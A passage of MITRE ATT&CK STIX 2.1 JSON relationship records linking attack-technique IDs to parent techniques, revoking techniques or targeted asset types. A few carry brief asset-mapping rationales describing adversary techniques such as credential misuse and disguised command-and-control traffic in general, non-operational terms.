"relationship--049ce77e-19b0-4641-8e49-8504ab47921e", "created": "2020-01-24T19:00:33.125Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--04aad4a8-8b8c-45d9-bb34-508fe4792863", "created": "2023-09-28T20:29:11.776Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:29:11.776Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--050b13e6-22e2-450c-a075-44a79fb79dc9", "created": "2020-02-11T18:42:07.392Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0536e9fb-2b02-43e4-b3e4-1191ed4b526d", "created": "2020-10-23T15:04:40.254Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--05d0c3fe-f210-4dd1-a082-45ac8f0c1c47", "created": "2019-12-19T21:05:38.420Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--05e3980c-03ae-4624-82d8-0cbcc45705cd", "created": "2020-01-31T12:35:36.758Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--064f8984-e6cc-4334-a5ad-903a7af9bf4c", "created": "2023-03-08T22:40:07.137Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-08T22:40:07.137Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0750563d-a86c-4822-ab9c-0f2d3c304c6e", "created": "2023-09-28T21:28:51.104Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:28:51.104Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07683c47-4572-4579-93e7-ac83f2933ac2", "created": "2020-01-14T17:19:51.120Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--076bfea6-309e-4804-a147-dffe93983481", "created": "2023-09-28T20:16:17.295Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:16:17.295Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--079bbf9d-0282-41af-8eb6-a6d914303895", "created": "2024-05-22T15:09:58.369Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:10:18.321Z", "description": "Asset Mapping Rationale: Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and network devices.", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07abc331-1277-4866-8794-a842586d3f5e", "created": "2024-05-23T04:05:52.586Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T19:56:25.826Z", "description": "Asset Mapping Rationale: Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07ae5595-8337-4422-b883-9a4085c6a08e", "created": "2024-05-23T04:08:36.321Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T20:37:56.927Z", "description": "Asset Mapping Rationale: Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment .Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07e06d21-e666-4274-838a-ef9996fdc0cd", "created": "2023-09-28T20:05:45.540Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:05:45.540Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07f11dc3-60d7-42d3-a4f0-82eba85dfe44", "created": "2023-09-29T16:47:20.192Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:47:20.192Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08fc37d1-2314-4661-abdb-1bf0472b2bf1", "created": "2020-01-24T17:42:23.793Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09254382-c7cd-4340-97c2-d8ecda757e59", "created": "2020-02-20T14:34:08.740Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0951222a-42d1-4635-bb12-5285bc6500e0", "created": "2023-09-28T20:15:45.244Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:15:45.244Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--095456bc-898b-4c76-a062-ff0ea90aeab4", "created": "2023-09-28T21:25:05.393Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:25:05.393Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--096c3136-dac9-4729-98c0-c8d870f2bd13", "created": "2023-09-28T19:42:01.055Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:42:01.055Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09bb741d-4f8b-4ae5-95f7-38d85e4d825a", "created": "2020-10-19T17:58:04.374Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09c76211-6357-4dc3-b4f6-361007e21af9", "created": "2020-10-02T17:03:46.050Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09e0c991-1707-431b-a0fd-fd8215e6d552", "created": "2023-09-28T20:30:12.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:30:12.291Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09e9ed5d-bf32-4aee-8441-774e21ffbdb6", "created": "2023-09-28T19:53:56.266Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:53:56.266Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a421699-f013-49f4-9d9f-01d95d210510", "created": "2023-09-28T19:37:25.214Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:37:25.214Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a5002d3-cf0d-4e26-9fc4-8faff7f6578a", "created": "2023-09-29T17:38:04.048Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:38:04.048Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a7810c5-850a-41e9-9d44-cbbdeebd8044", "created": "2020-03-19T21:27:32.904Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a8f5e7d-04d8-4ca8-a1d1-ea6a0ccc6140", "created": "2020-06-09T15:33:13.766Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ad2b49a-d35f-464c-a3c6-f9342977fefc", "created": "2020-03-13T21:02:20.018Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", "target_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b24b8de-944d-49ea-a15f-cb732aeb31de", "created": "2020-02-10T20:03:11.833Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b2a6fc5-3416-4d78-96cb-f6325c91ab91", "created": "2023-10-02T20:23:11.865Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:23:11.865Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b2d0517-9943-413e-a6f9-30c6d5ce8c42", "created": "2023-09-28T19:59:10.561Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:59:10.561Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b66c798-f1fc-4e2f-b3b4-433dde89a191", "created": "2020-01-24T13:41:32.702Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", "target_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b6cd19f-ee13-4224-9e22-f8a9e626d98f", "created": "2023-09-28T21:22:48.239Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:22:48.239Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b92b0f0-fdc0-4f20-98f3-ca2c1932de24", "created": "2024-05-22T17:14:23.919Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T21:20:20.489Z", "description": "Asset Mapping Rationale: Adversaries may impair command history logging to hide commands they run on a compromised system. Adversaries may also leverage a Network Device CLI on network devices to disable historical command logging.", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ba1db3a-389a-4937-975b-d2dc0142cb4b", "created": "2023-09-29T18:46:22.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:46:22.739Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0bc90405-24a9-4f84-a1bb-bf953dbca016", "created": "2023-09-28T20:10:34.479Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:10:34.479Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0be618a0-f752-450f-8838-60c17fabd278", "created": "2020-02-04T13:06:49.734Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c29bffb-78c0-43c0-8b99-f5155bfa0432", "created": 